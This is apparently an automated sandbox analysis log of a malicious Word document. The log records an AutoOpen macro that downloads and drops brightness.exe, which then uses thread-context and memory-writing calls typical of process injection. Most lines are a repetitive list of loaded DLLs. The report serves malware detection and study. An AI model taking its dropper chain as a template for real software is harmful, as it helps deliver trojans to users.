            Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'ADODB.Stream' functions open, savetofile, writeName: AutoOpen
            Source: zYj1wg0cM2.docStream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send
            Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'XMLHttpRequest' functions response, responsebody, open, sendName: AutoOpen
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}Jump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290DFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,7_2_0290DFE4
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_02907CF8 NtWriteVirtualMemory,7_2_02907CF8
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_02908BA6 GetThreadContext,SetThreadContext,NtResumeThread,7_2_02908BA6
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_02908BA8 GetThreadContext,SetThreadContext,NtResumeThread,7_2_02908BA8
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290DE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,7_2_0290DE24
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290DE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,7_2_0290DE78
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290DF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,7_2_0290DF00
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290F0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,7_2_0290F0A8
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028F20C47_2_028F20C4
            Source: zYj1wg0cM2.docOLE, VBA macro line: Sub AutoOpen()
            Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
            Source: zYj1wg0cM2.docOLE indicator, VBA macros: true
            Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 028F46A4 appears 244 times
            Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 02908798 appears 54 times
            Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 0290881C appears 45 times
            Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 028F44AC appears 74 times
            Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 028F480C appears 931 times
            Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 028F44D0 appears 33 times
            Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@4/3@1/2
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028F7F54 GetDiskFreeSpaceA,7_2_028F7F54
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_02906D48 CoCreateInstance,7_2_02906D48
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$j1wg0cM2.docJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{F6605045-D132-47C0-A4CA-F1F9FD65C87A} - OProcSessId.datJump to behavior
            Source: zYj1wg0cM2.docOLE indicator, Word Document stream: true
            Source: zYj1wg0cM2.docOLE document summary: title field not present or empty
            Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: zYj1wg0cM2.docVirustotal: Detection: 70%
            Source: zYj1wg0cM2.docReversingLabs: Detection: 57%
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exeJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: url.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: smartscreenps.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winhttpcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
